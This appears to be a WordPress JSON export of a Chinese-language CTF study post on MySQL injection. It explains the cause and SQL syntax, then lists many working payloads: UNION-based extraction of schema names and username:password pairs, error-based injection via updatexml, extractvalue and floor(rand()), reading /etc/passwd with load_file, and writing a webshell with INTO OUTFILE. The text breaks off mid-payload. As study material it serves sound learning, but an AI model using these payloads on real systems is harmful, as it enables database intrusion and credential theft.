{"id":44,"date":"2026-03-14T22:30:57","date_gmt":"2026-03-14T14:30:57","guid":{"rendered":"http:\/\/47.118.30.30\/?p=44"},"modified":"2026-03-15T11:40:55","modified_gmt":"2026-03-15T03:40:55","slug":"mysql%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/03\/14\/mysql%e6%b3%a8%e5%85%a5\/","title":{"rendered":"mysql\u6ce8\u5165"},"content":{"rendered":"

sql\u6ce8\u5165\uff1a<\/h1>\n

CTF\u00b7Web\u57fa\u7840 | PureStream & Marblue<\/a><\/p>\n

\u3010\u8d85\u8be6\u7ec6\u7248\u3011SQL\u6ce8\u5165\u539f\u7406\u53ca\u601d\u8def\u7ed5\u8fc7(\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86)-CSDN\u535a\u5ba2<\/a><\/p>\n

SQL \u6ce8\u5165 – Hello CTF<\/a><\/p>\n

\u6210\u56e0\uff1a<\/h3>\n

web\u5e94\u7528\u7a0b\u5e8f\u5728\u63a5\u6536\u76f8\u5173\u6570\u636e\u53c2\u6570\u65f6\u672a\u505a\u597d\u8fc7\u6ee4\uff0c\u5c06\u5176\u76f4\u63a5\u5e26\u5165\u5230\u6570\u636e\u5e93\u4e2d\u67e5\u8be2\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u62fc\u63a5\u6267\u884c\u6784\u9020\u7684SQL\u8bed\u53e5\u3002<\/p>\n

sql\u8bed\u53e5\u662f\u4ec0\u4e48\uff1a<\/h3>\n

\u4e00\u79cd\u5173\u7cfb\u578b\u6570\u636e\u5e93\u67e5\u8be2\u7684\u6807\u51c6\u7f16\u7a0b\u8bed\u8a00\uff0c\u7528\u4e8e\u5b58\u53d6\u6570\u636e\u4ee5\u53ca\u67e5\u8be2\u3001\u66f4\u65b0\u3001\u5220\u9664\u548c\u7ba1\u7406\u5173\u7cfb\u578b\u6570\u636e\u5e93\uff08\u5373SQL\u662f\u4e00\u79cd\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u8a00\uff09\u3002<\/p>\n

\u5173\u4e8e\u5e93\uff08SCHEMA\uff09\uff0c\u8868\uff08TABLE\uff09\uff0c\u5217 \uff08Column\uff09<\/strong>\uff0c\u4ee5\u53ca\u884c\uff1a<\/h3>\n

\u7b80\u5355\u6765\u8bf4\u5c31\u662f\u6570\u636e\u5b58\u50a8\u7684\u7ed3\u6784\uff0c\u76f4\u63a5\u4e3e\u4f8b\u5427\uff1a<\/p>\n

\u6570\u636e\u5e93\uff1aschool\n\u2003\u2514\u2500\u2500 \u8868\uff1astudents\n\u2003\u2003\u2003\u251c\u2500\u2500 \u5217\uff1aid | name | age | email\n\u2003\u2003\u2003\u251c\u2500\u2500 \u884c1\uff1a1 | \u5f20\u4e09 | 18 | zhangsan@example.com\n\u2003\u2003\u2003\u2514\u2500\u2500 \u884c2\uff1a2 | \u674e\u56db | 19 | lisi@example.com<\/code><\/pre>\n
mysql\u57fa\u672c\u8bed\u6cd5\uff1a<\/h3>\n
--\u548c#\uff1a\u6ce8\u91ca\n\n\/* ... *\/\uff1a\u591a\u884c\u6ce8\u91ca \n\n;:\u8bed\u53e5\u5206\u9694\u7b26\uff0c\u53ef\u7528\u4e8e\u5806\u53e0\u591a\u6761\u6307\u4ee4\n\n||:|| \u5728 MySQL \u9ed8\u8ba4\u6a21\u5f0f\u4e0b\u662f\u903b\u8f91 OR\uff0c\u4e0d\u662f\u5b57\u7b26\u4e32\u62fc\u63a5,\u9700\u5f00\u542f PIPES_AS_CONCAT\n\nSELECT:\u67e5\u8be2\n\u683c\u5f0f\uff1a\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SELECT [DISTINCT] column1, column2, ...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0FROM table_name\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0[WHERE condition]\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0[GROUP BY column(s)]\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0[HAVING group_condition]\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0[ORDER BY column(s) [ASC|DESC]]\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0[LIMIT number];\n\u53c2\u6570\uff1a\nSELECT\uff1a\u6307\u5b9a\u8981\u67e5\u8be2\u7684\u5217\uff0c\u53ef\u7528 * \u4ee3\u8868\u6240\u6709\u5217\uff0c\u4e5f\u53ef\u5199\u5177\u4f53\u5b57\u6bb5\u540d\uff0c\u652f\u6301\u8868\u8fbe\u5f0f\uff08\u5982 `name\nFROM\uff1a\u6307\u5b9a\u6570\u636e\u6765\u6e90\u8868\uff0c\u53ef\u5305\u542b\u591a\u4e2a\u8868\uff08JOIN\uff09\nWHERE\uff1a\u8fc7\u6ee4\u884c\uff08\u8bb0\u5f55\uff09\uff0c\u6761\u4ef6\u4e3a TRUE \u7684\u884c\u624d\u4f1a\u88ab\u8fd4\u56de\nGROUP BY\uff1a\u5bf9\u7ed3\u679c\u5206\u7ec4\uff0c\u901a\u5e38\u4e0e\u805a\u5408\u51fd\u6570\uff08\u5982 COUNT, SUM\uff09\u4e00\u8d77\u7528\nHAVING\uff1a\u8fc7\u6ee4\u5206\u7ec4\u540e\u7684\u7ed3\u679c\uff0c\u4f5c\u7528\u4e8e GROUP BY \u4e4b\u540e\nORDER BY\uff1a\u5bf9\u7ed3\u679c\u6392\u5e8f\uff0c\u9ed8\u8ba4\u5347\u5e8f\uff08ASC\uff09\uff0c\u53ef\u6307\u5b9a DESC \u964d\u5e8f\nLIMIT\uff1a\u9650\u5236\u8fd4\u56de\u884c\u6570\uff0c\u5e38\u7528\u4e8e\u5206\u9875\uff08MySQL\/PostgreSQL\uff09\uff0cSQLite \u4e5f\u652f\u6301\uff1bSQL Server \u7528 TOP\uff0cOracle \u7528 ROWNUM\n\nINSERT\uff1a\u63d2\u5165\u6570\u636e\n\u683c\u5f0f\uff1a\nINSERT INTO table_name (column1, column2, ...)\nVALUES (value1, value2, ...);\n\nUPDATE\uff1a\u66f4\u65b0\u6570\u636e\n\u683c\u5f0f\uff1a\nUPDATE table_name\nSET column1 = value1, column2 = value2, ...\nWHERE condition;\n\nDELETE\uff1a\u5220\u9664\u6570\u636e\n\u683c\u5f0f\uff1a\nDELETE FROM table_name\nWHERE condition;\n\nCREATE TABLE\uff1a\u521b\u5efa\u8868\uff09\n\u683c\u5f0f\uff1a\nCREATE TABLE table_name (\n    column1 datatype [constraints],\n    column2 datatype [constraints],\n    ...\n);\n\nUNION SELECT\u548cUNION ALL SELECT\uff1a\u7528\u4e8e\u4ece\u5176\u4ed6\u8868\u4e2d\u63d0\u53d6\u6570\u636e\uff0c\u8981\u6c42\u5b57\u6bb5\u6570\u548c\u7c7b\u578b\u9700\u5339\u914d\u539f\u6709\u67e5\u8be2\n\nDATABASE()\u6216SCHEMA()\uff1a\u5f53\u524d\u6570\u636e\u5e93\u540d\n\n@@DATADIR()\uff1a\u6570\u636e\u5e93\u5b58\u50a8\u6570\u636e\u8def\u5f84\n\nUSER()\u6216CURRENT_USER()\uff1a\u5f53\u524d\u6570\u636e\u5e93\u7528\u6237\n\nVERSION()\uff1aMySQL\u7248\u672c\n\ninformation_schema.SCHEMATA\uff1a\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\n\ninformation_schema.TABLES\uff1a\u5217\u51fa\u8868\n\u4f8b\uff1aSELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()\n\ninformation_schema.COLUMNS\uff1a\u5217\u51fa\u5217\n\u4f8b\uff1aSELECT column_name FROM information_schema.columns WHERE table_name='users'\n\nCONCAT(str1, str2, ...)\uff1a\u62fc\u63a5\u53c2\u6570\u6c42\u503c\u7ed3\u679c,\u4f46\u6bcf\u9879\u53ea\u8fd4\u56de\u4e00\u884c\n\nGROUP_CONCAT(...)\uff1a\u7c7b\u4f3cconcat\uff0c\u5c06\u591a\u884c\u5408\u5e76\u4e3a\u4e00\u884c\uff08\u7ed5\u8fc7\u5206\u9875\u6216\u9010\u884c\u9650\u5236\uff09\n\nSUBSTR()\u6216SUBSTRING()\uff1a\u7528\u4e8e\u4ece\u5b57\u7b26\u4e32\u4e2d\u63d0\u53d6\u5b50\u4e32\n\u4f8b\uff1aSUBSTR(\u539f\u59cb\u5b57\u7b26\u4e32, \u8d77\u59cb\u4f4d\u7f6e, \u957f\u5ea6)\n\nMID()\uff1a\u7b49\u4ef7\u4e8e SUBSTR\n\nCHAR()\uff1a\u5c06 ASCII \u8f6c\u4e3a\u5b57\u7b26\uff08\u7ed5\u8fc7\u5f15\u53f7\uff09\n\nHEX() \/ UNHEX()\uff1a\u7528\u4e8e\u5341\u516d\u8fdb\u5236\u7f16\u7801\u4e0e\u89e3\u7801\uff0c\u7ed5\u8fc7\u7528\u7684\n\nIF(condition, true_val, false_val)\uff1a\u5982\u679c condition \u4e3a\u771f\uff08\u975e\u96f6\u4e14\u975e NULL\uff09\uff0c\u8fd4\u56detrue_val\uff0c\u5426\u5219\u8fd4\u56defalse_val\u3002\n\u4f8b\uff1aSELECT IF(1=1, 'Yes', 'No'); -- 'Yes'\n\nCASE WHEN ... THEN ... ELSE ... END\uff1a\u7c7b\u4f3cifelse\u8bed\u53e5\n\u4f8b\uff1aCASE\n  \u00a0   WHEN condition1 THEN result1\n      WHEN condition2 THEN result2\n      ...\n      ELSE default_result\n    END\n\nSLEEP(seconds):\u65f6\u95f4\u5ef6\u8fdf\uff08\u7528\u4e8e\u65f6\u95f4\u76f2\u6ce8\uff09\n\nLOAD_FILE('\/etc\/passwd')\uff1a\u8bfb\u6587\u4ef6\n\nINTO OUTFILE '\/var\/www\/shell.php'\uff1a\u5199\u6587\u4ef6\n\nINTO DUMPFILE\uff1a\u5199\u6587\u4ef6\n\nPIPES_AS_CONCAT\uff1a\u5c06 || \u6216\u8fd0\u7b97\u7b26\u8f6c\u6362\u4e3a\u8fde\u63a5\u5b57\u7b26\uff0c\u5373\u5c06||\u524d\u540e\u6c42\u503c\u7ed3\u679c\u62fc\u63a5\u5230\u4e00\u8d77\n\u683c\u5f0f\uff1aset sql_mode=PIPES_AS_CONCAT\n\n\u5173\u4e8e\u5728\u8fd9\u4f7f\u7528 ` \u800c\u4e0d\u662f \u2019 \u7684\u4e00\u4e9b\u89e3\u91ca\uff1a\n\u4e24\u8005\u5728linux\u4e0b\u548cwindows\u4e0b\u4e0d\u540c\uff0clinux\u4e0b\u4e0d\u533a\u5206\uff0cwindows\u4e0b\u533a\u5206\u3002\n\u5355\u5f15\u53f7 \u2019 \u6216\u53cc\u5f15\u53f7\u4e3b\u8981\u7528\u4e8e \u5b57\u7b26\u4e32\u7684\u5f15\u7528\u7b26\u53f7\n\u53cd\u52fe\u53f7 ` \u6570\u636e\u5e93\u3001\u8868\u3001\u7d22\u5f15\u3001\u5217\u548c\u522b\u540d\u7528\u7684\u662f\u5f15\u7528\u7b26\u662f\u53cd\u52fe\u53f7 (\u6ce8\uff1aEsc\u4e0b\u9762\u7684\u952e)\n\u6709MYSQL\u4fdd\u7559\u5b57\u4f5c\u4e3a\u5b57\u6bb5\u7684\uff0c\u5fc5\u987b\u52a0\u4e0a\u53cd\u5f15\u53f7\u6765\u533a\u5206\uff01\uff01\uff01\n\u5982\u679c\u662f\u6570\u503c\uff0c\u8bf7\u4e0d\u8981\u4f7f\u7528\u5f15\u53f7\u3002<\/code><\/pre>\n
\u7b80\u5355\u67e5\u8be2\u8bed\u53e5\uff1a<\/h3>\n
SELECT * FROM users WHERE username = 'user' AND password = 'password';<\/code><\/pre>\n
\u5229\u7528\u6b65\u9aa4\uff1a<\/h3>\n
1\uff1a\u5224\u65ad\u5b58\u5728sql\u6ce8\u5165\/\u5bfb\u627e\u6ce8\u5165\u70b9\uff1a<\/h3>\n
\u5728GET\u53c2\u6570\u3001POST\u53c2\u6570\u3001Cookie\u3001Referer\u3001XFF\u3001UA\u7b49\u5730\u65b9\u5c1d\u8bd5\u63d2\u5165\u4ee3\u7801\u3001\u7b26\u53f7\u6216\u8bed\u53e5\uff0c\u5c1d\u8bd5\u662f\u5426\u5b58\u5728\u6570\u636e\u5e93\u53c2\u6570\u8bfb\u53d6\u884c\u4e3a\uff0c\u4ee5\u53ca\u80fd\u5426\u5bf9\u5176\u53c2\u6570\u4ea7\u751f\u5f71\u54cd\uff0c\u5982\u4ea7\u751f\u5f71\u54cd\u5219\u8bf4\u660e\u5b58\u5728\u6ce8\u5165\u70b9\uff0c\u540c\u65f6\u4e5f\u53ef\u5224\u65ad\u8bed\u53e5\u95ed\u5408\u7c7b\u578b<\/p>\n
\u6d4b\u8bd5\u4f4d\u7f6e\uff1aURL\u53c2\u6570\u3001POST\u8868\u5355\u3001HTTP\u5934\uff08\u5982Cookie\u3001User-Agent\uff09<\/p>\n
\u89e6\u53d1\u5f02\u5e38\uff1a\u6dfb\u52a0\u5355\u5f15\u53f7'<\/code>\u3001\u53cc\u5f15\u53f7\"<\/code>\u3001\u53cd\u659c\u6760<\/code>\u8fd8\u6709')<\/code>\u7b49\u89c2\u5bdf\u662f\u5426\u62a5\u9519\u6216\u9875\u9762\u53d8\u5316<\/p>\n
\u5e38\u89c1\u6d4b\u8bd5\u4ee3\u7801\uff1a<\/p>\n
?id=1'\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u5982\u679c\u62a5\u9519\u8868\u793a\u5b58\u5728\u6ce8\u5165\n\u539f\u7406\uff1a\u5b9e\u9645\u6267\u884c\u7684\u662f\uff1aSELECT * FROM users WHERE username = '1'' AND password = 'password';\u8fd9\u6837'\u6ca1\u80fd\u6b63\u5e38\u95ed\u5408\u62a5\u9519\n\n?id=1' AND 1=1\u00a0#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u9875\u9762\u6b63\u5e38\n?id=1' AND 1=2\u00a0# \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u9875\u9762\u5f02\u5e38\uff08\u7a7a\u767d\u6216\u9519\u8bef\uff09\n\u539f\u7406\uff1a\u5b9e\u9645\u6267\u884c\u7684\u662f:SELECT * FROM users WHERE username = '1' AND 1=1\u00a0#' AND password = 'password';\n\u4ee5\u53ca\uff1aSELECT * FROM users WHERE username = '1' AND 1=2\u00a0#' AND password = 'password';\n\u524d\u8005\u56e0\u4e3a1=1\u6052\u8fd4\u56deture\u6240\u4ee5\u6b63\u5e38\u6267\u884c\uff0c\u540e\u8005\u56e0\u4e3a1=2\u6052\u8fd4\u56defalse\u603b\u662f\u62a5\u9519\n<\/code><\/pre>\n
2:\u63d0\u53d6\u4fe1\u606f\uff0c\u7206\u5e93\u540d\u8868\u540d\u7b49\uff1a<\/h3>\n
\u67e5\u8be2\u7248\u672c\uff1a\n' AND 1=1 UNION SELECT 1, VERSION() --\n' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x3a, VERSION(), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a) --\n\n\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u540d\uff1a\nDATABASE()\nSCHEMA()\n\n\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\uff1a\n' UNION SELECT 1, schema_name FROM information_schema.schemata --\n\n\u5217\u51fa\u5f53\u524d\u6570\u636e\u5e93\u6240\u6709\u8868\uff1a\n' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema=DATABASE() --\n\u6216\u6307\u5b9a\u6570\u636e\u5e93\uff1a\n' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema='mydb' --\n\n\u5217\u51fa\u6307\u5b9a\u8868\u7684\u5217\uff08\u5b57\u6bb5\uff09\uff1a\n' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users' --\n\u82e5 UNION \u5b57\u6bb5\u6570\u4e0d\u5339\u914d\uff0c\u5148\u7528 ' ORDER BY N -- \u786e\u5b9a\u5b57\u6bb5\u6570\u91cf\u3002\n\n\u8bfb\u53d6\u6570\u636e\uff1a\n' UNION SELECT 1, CONCAT(username, 0x3a, password) FROM users --\n\u5408\u5e76\u8bfb\u53d6\u591a\u884c\u6570\u636e\uff1a\n' UNION SELECT 1, GROUP_CONCAT(username, 0x3a, password) FROM users --\n\/\/\u6ce8\uff1a0x3a\u662f\u5192\u53f7\u201c:\u201d\u7684\u5341\u516d\u8fdb\u5236\uff0c\u907f\u514d\u7a7a\u683c\u6216\u7279\u6b8a\u5b57\u7b26\u5e72\u6270<\/code><\/pre>\n
3\uff1a\u5224\u65ad\u6ce8\u5165\u7c7b\u578b<\/h3>\n
\u4ee5\u4e0b\u5217\u51fa\u5e38\u89c1\u6ce8\u5165\u7c7b\u578b\uff0c\u4ee5\u53ca\u5224\u65ad\u548c\u5229\u7528\u65b9\u6cd5\uff1a<\/p>\n
1\uff1aUNION-based SQL Injection\uff08\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09\uff1a<\/strong><\/p>\n
\u524d\u63d0\uff1a\u6ce8\u5165\u70b9\u4f4d\u4e8e SELECT<\/code> \u67e5\u8be2\u4e2d\uff0c\u4e14\u5e94\u7528\u7a0b\u5e8f\u4f1a\u5c06 SQL \u67e5\u8be2\u7ed3\u679c\u76f4\u63a5\u56de\u663e\u5230\u9875\u9762<\/p>\n
\u539f\u7406\uff1a\u5229\u7528 UNION SELECT<\/code> \u5c06\u653b\u51fb\u8005\u6784\u9020\u7684\u67e5\u8be2\u7ed3\u679c\u5408\u5e76\u5230\u539f\u59cb\u67e5\u8be2\u7ed3\u679c\u4e2d\uff0c\u4ece\u800c\u76f4\u63a5\u8bfb\u53d6\u6570\u636e\u5e93\u5185\u5bb9<\/p>\n
union select\uff1aSQL \u4e2d\u7528\u4e8e\u5408\u5e76\u591a\u4e2a SELECT<\/code> \u67e5\u8be2\u7ed3\u679c\u96c6\u7684\u5173\u952e\u5b57\u7ec4\u5408\u3002\u5728 SQL \u6ce8\u5165\uff08\u5c24\u5176\u662f\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09\u4e2d\uff0c\u653b\u51fb\u8005\u5e38\u5229\u7528\u5b83\u5c06\u6076\u610f\u67e5\u8be2\u7ed3\u679c\u201c\u6ce8\u5165\u201d\u5230\u539f\u59cb\u67e5\u8be2\u7684\u54cd\u5e94\u4e2d\uff0c\u4ece\u800c\u7a83\u53d6\u6570\u636e\u5e93\u4e2d\u7684\u654f\u611f\u4fe1\u606f\u3002\u4f46\u662f\u4f7f\u7528\u65f6\u5fc5\u987b\u6ce8\u610f\u4e24\u4e2a SELECT<\/code> \u8fd4\u56de\u7684\u5217\u6570\u91cf\u5fc5\u987b\u76f8\u540c\uff0c\u6bcf\u4e00\u5217\u7684\u6570\u636e\u7c7b\u578b\u5e94\u517c\u5bb9\uff0c\u540c\u65f6\uff0cUNION<\/code> \u9ed8\u8ba4\u53bb\u91cd\uff0c\u4f46UNION ALL<\/code> \u4fdd\u7559\u91cd\u590d\u884c\u3002<\/p>\n
\u5224\u65ad\uff1a<\/p>\n
\u5148\u786e\u8ba4\u5b57\u6bb5\u6570\/\u5217\u6570\uff1a<\/p>\n
' ORDER BY 1-- \n' ORDER BY 2-- \n' ORDER BY 3-- \n...\u00a0\u00a0\u00a0\n\/\/\u76f4\u5230\u62a5\u9519\uff0c\u90a3\u4e48\u5b57\u6bb5\u6570\/\u5217\u6570\u5c31\u662f\u62a5\u9519\u90a3\u6bb5\u7684n-1\uff0c\u6bd4\u5982' ORDER BY 3--\u62a5\u9519\u90a3\u5b57\u6bb5\u6570\/\u5217\u6570\u5c31\u662f2\u00a0\u00a0\u00a0<\/code><\/pre>\n
\u7136\u540e\u6d4b\u8bd5\u56de\u663e\uff1a<\/p>\n
' UNION SELECT 1,2,3--\n\/\/\u5982\u679c\u9875\u9762\u5728\u6b63\u5e38\u67e5\u8be2\u6570\u636e\u540e\u663e\u793a 1\u30012\u30013\uff08\u6216\u5176\u4e2d\u67d0\u4e9b\u6570\u5b57\uff09\uff0c\u8bf4\u660e\u5b58\u5728 UNION \u6ce8\u5165\u70b9\uff0c\u4e14\u56de\u663e\u4e86\u6570\u5b57\u7684\u5c31\u662f\u56de\u663e\u4f4d\uff0c\u8bed\u53e5\u4e2d\u5bf9\u5e94\u6570\u5b57\u53ef\u4ee5\u66ff\u6362\u6210\u67e5\u8be2\u8bed\u53e5\u6765\u63d0\u53d6\u6570\u636e\u3002\u82e5\u6570\u5b57\u4e0d\u663e\u793a\uff0c\u5c1d\u8bd5\u5b57\u7b26\u4e32\uff0c\u6bd4\u5982'1'\u66ff\u63621\n\n-1' UNION SELECT NULL--\n-1' UNION SELECT NULL,NULL--\n\/\/\u4e5f\u53ef\u4ee5\u8fd9\u6837\u6d4b\u8bd5\u5217\u6570\uff0c\u524d\u9762\u7528\u8d1f\u6570\u90a3\u524d\u9762\u7684select\u5c31\u4e0d\u56de\u663e\u6570\u636e\uff0c\u53ea\u6709\u540e\u9762\u4e00\u4e2aselect\u56de\u663e\uff0c\u800c\u5f53\u51fa\u73b0\u6b63\u5e38\u56de\u663e\u6216\u663e\u793a\u989d\u5916\u5185\u5bb9\u8bf4\u660e\u5217\u6570\u5339\u914d\uff0c\u7136\u540e\u6328\u4e2a\u5c06NULL\u66ff\u6362\u4f4d\u6570\u5b57\u6216\u5b57\u7b26\u5373\u53ef\u6d4b\u8bd5\u51fa\u56de\u663e\u4f4d<\/code><\/pre>\n
\u6709\u56de\u663e\u5373\u53ef\u5229\u7528<\/p>\n
\u5229\u7528\uff1a<\/p>\n
\u76f4\u63a5\u62ff\u6570\u636e\uff1a<\/p>\n
' UNION SELECT 1, DATABASE(), 3--\n\/\/\u83b7\u53d6\u6570\u636e\u5e93\u540d\n\n' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema=DATABASE()--\n\/\/\u8bfb\u53d6\u8868\u540d\n\n' UNION SELECT 1, column_name, 3 FROM information_schema.columns WHERE table_name='users'--\n\/\/\u8bfb\u53d6\u5217\u540d\n\n' UNION SELECT 1, CONCAT(username, 0x3a, password), 3 FROM users--\n\/\/\u63d0\u53d6\u6570\u636e\n\n' UNION SELECT 1, GROUP_CONCAT(username, 0x3a, password), 3 FROM users--\n\/\/\u7ed5\u8fc7\u957f\u5ea6\u9650\u5236\uff08\u4f7f\u7528 GROUP_CONCAT\uff09\n\nload_file\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6\u6587\u4ef6\uff0c\u5982\uff1a-1 union\/**\/select 1,load_file(\"\/var\/www\/html\/flag.php\"),3,4--+(\u9700\u8981\u6743\u9650\u548c\u7edd\u5bf9\u8def\u5f84)<\/code><\/pre>\n
2\uff1aError-based SQL Injection\uff08\u9519\u8bef\u6ce8\u5165\uff09<\/strong><\/p>\n
\u524d\u63d0\uff1a\u5e94\u7528\u7a0b\u5e8f\u5c06\u6570\u636e\u5e93\u9519\u8bef\u4fe1\u606f\u76f4\u63a5\u663e\u793a\u7ed9\u7528\u6237\uff08\u5982 PHP \u5f00\u542f\u4e86\u9519\u8bef\u663e\u793a\uff09<\/p>\n
\u539f\u7406\uff1a\u5229\u7528 MySQL \u7684\u62a5\u9519\u51fd\u6570\uff0c\u5c06\u60f3\u8981\u7684\u6570\u636e\u5d4c\u5165\u5230\u9519\u8bef\u6d88\u606f\u4e2d\u8fd4\u56de<\/p>\n
\u5224\u65ad\uff1a<\/p>\n
\u89e6\u53d1\u4e00\u4e2a\u53ef\u63a7\u9519\u8bef\uff1a<\/p>\n
' AND (SELECT 1 FROM nonexistent_table)--\n\/\/\u82e5\u8fd4\u56de\u7c7b\u4f3c Table 'db.nonexistent_table' doesn't exist\uff0c\u8bf4\u660e\u9519\u8bef\u53ef\u89c1\u3002<\/code><\/pre>\n
\u5229\u7528\uff1a<\/p>\n
updatexml() \u51fd\u6570\uff0c\u5f53\u7b2c\u4e8c\u4e2a\u53c2\u6570\u5305\u542b\u7279\u6b8a\u7b26\u53f7\u65f6\u4f1a\u62a5\u9519\uff0c\u5e76\u5c06\u7b2c\u4e8c\u4e2a\u53c2\u6570\u7684\u5185\u5bb9\u663e\u793a\u5728\u62a5\u9519\u4fe1\u606f\u4e2d\n\u6240\u4ee5\u6784\u9020\u5982\u4e0b\uff1a\n' and updatexml(1, concat(0x7e,version()), 3) --+\n' and updatexml(1,concat(0x7e,(select group_concat(schema_name)from information_schema.schemata),0x7e),1) --+\n\/\/\u5176\u4e2d0x7e\u7b49\u4ef7\u4e8e~\n\nFLOOR(RAND(0)*2) + GROUP BY\u4e3b\u952e\u91cd\u590d\u5bfc\u81f4\u62a5\u9519\nrand(0)*2 \u53ef\u4ee5\u4ea7\u751f[0,2)\u4e4b\u95f4\u7684\u968f\u673a\u6570\nfloor()\u8fd4\u56de\u5c0f\u4e8e\u7b49\u4e8e\u62ec\u53f7\u5185\u8be5\u503c\u7684\u6700\u5927\u6574\u6570\nfloor (rand(0)*2) \u53ef\u4ee5\u4ea7\u751f\u4e24\u4e2a\u786e\u5b9a\u7684\u6570\uff0c\u4e5f\u5c31\u662f0\u548c1\ngroup by \u5206\u7c7b\u6c47\u603b\ncount\uff08*\uff09 \u7edf\u8ba1\u7ed3\u679c\u7684\u8bb0\u5f55\u6570\n\u6784\u9020\u5982\u4e0b\uff1a\n' and (select 1 from (select count(*),concat((select concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+\n\u6216\n' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+\n\u6216\n' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x3a, DATABASE(), 0x3a, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)--\n\/\/COUNT(*) \u662f\u4e00\u4e2a\u805a\u5408\u51fd\u6570\uff0c\u7528\u4e8e\u7edf\u8ba1\u67e5\u8be2\u7ed3\u679c\u7684\u884c\u6570\uff0c\u5728 GROUP BY \u67e5\u8be2\u4e2d\uff0c\u5fc5\u987b\u81f3\u5c11\u6709\u4e00\u4e2a\u805a\u5408\u51fd\u6570\uff08\u5982 COUNT, MAX, SUM \u7b49\uff09\uff0c\u5426\u5219\u8bed\u6cd5\u4e0d\u5408\u6cd5\n\/\/RAND(0) \u8868\u793a\u4f7f\u7528\u79cd\u5b50 0 \u521d\u59cb\u5316\u968f\u673a\u6570\u751f\u6210\u5668\uff0c\u56e0\u6b64\u7ed3\u679c\u662f\u786e\u5b9a\u6027\u7684\uff0cFLOOR(RAND(0)*2) \u5c06 RAND(0) \u7684\u7ed3\u679c\u00d72\uff0c\u518d\u5411\u4e0b\u53d6\u6574\uff0c\u5f97\u52300\u62161\u3002\n\/\/AS x\u7ed9\u62fc\u63a5\u7ed3\u679c\u8d77\u4e00\u4e2a\u522b\u540dx\uff0c\u65b9\u4fbf\u5728 GROUP BY \u4e2d\u5f15\u7528\u3002\n\nextractvalue()\u51fd\u6570\uff1aMySQL \u63d0\u4f9b\u7684\u4e00\u4e2a XML \u51fd\u6570\uff0c\u7528\u4e8e\u4ece XML \u6587\u6863\u4e2d\u63d0\u53d6\u7279\u5b9a XPath \u8868\u8fbe\u5f0f\u5339\u914d\u7684\u503c\u3002\u683c\u5f0f\uff1aextractvalue\uff08XML_document\uff0cxpath_string\uff09\u7b2c\u4e00\u4e2a\u53c2\u6570\uff1astring\u683c\u5f0f\uff0c\u4e3aXML\u6587\u6863\u5bf9\u8c61\u7684\u540d\u79f0\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570\uff1axpath_string\uff08xpath\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\uff09\u3002\u5f53xpath_string\u683c\u5f0f\u975e\u5b57\u7b26\u4e32\u65f6\u62a5\u9519\u3002\u8fd9\u5728 SQL \u6ce8\u5165\uff08\u7279\u522b\u662f \u57fa\u4e8e\u9519\u8bef\u7684\u6ce8\u5165\uff09\u4e2d\u88ab\u5e7f\u6cdb\u7528\u4e8e\u5f3a\u5236\u89e6\u53d1\u5305\u542b\u654f\u611f\u6570\u636e\u7684 XPath \u9519\u8bef\uff0c\u4ece\u800c\u6cc4\u9732\u4fe1\u606f\u3002\n\u6784\u9020\u5982\u4e0b\uff1a\n' AND EXTRACTVALUE(1, CONCAT(0x5c, DATABASE()))--+\n\/\/0x5c = \"\",\uff08\u7528\u4e8e\u89e6\u53d1 XML \u89e3\u6790\u9519\u8bef\uff09\n\n\u7531\u4e8e\u62a5\u9519\u6570\u636e\u663e\u793a\u6709\u957f\u5ea6\u9650\u5236\uff0c\u6240\u4ee5\u6709\u65f6\u9700\u8981\u622a\u53d6\u6570\u636e\n\u6784\u9020\u5982\u4e0b\uff1a\n' and updatexml(1,concat(0x7e,(select userfrom mysql.user limit 0,1)),3) --+\n\/\/\u5c55\u793a\u7b2c\u96f6\u6761\u6570\u636e\n' and updatexml(1,concat(0x7e,(select userfrom mysql.user limit 1,1)),3) --+\n\/\/\u5c55\u793a\u7b2c\u4e00\u6761\u6570\u636e\n' and updatexml(1,concat(0x7e,substr((select group_concat(user) from mysql.user), 1 , 31)),3) 